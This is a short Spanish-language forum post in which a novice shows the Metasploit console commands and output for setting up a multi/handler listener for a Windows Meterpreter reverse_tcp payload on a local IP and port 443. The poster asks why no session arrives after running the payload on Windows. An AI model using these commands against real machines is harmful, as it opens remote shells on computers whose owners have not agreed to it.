El problema es que cuando termino de configurar la consola de metasploit para hacer un ataque en windows, termina el proceso de escuccha, y queda algo como esto:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.3      yes       The listen address
   LPORT     443              yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
    Exploit running as background job.
    Started reverse TCP handler on 192.168.1.3:443 
msf exploit(handler) >
y hasta alli queda, no se si tengo algo malo, y me puedan corregir?
tambien,anteriormente, no funcionaba el payload cuando se abria el programa en windows, se quedaba atascado en esto:
msf exploit(handler) > exploit
    Exploit running as background job.
    Started reverse TCP handler on 192.168.1.3:443 
PD: Soy nuevo en esto.
						

 
  




 Autor
 Autor
		


 En línea
									En línea
								
 
						
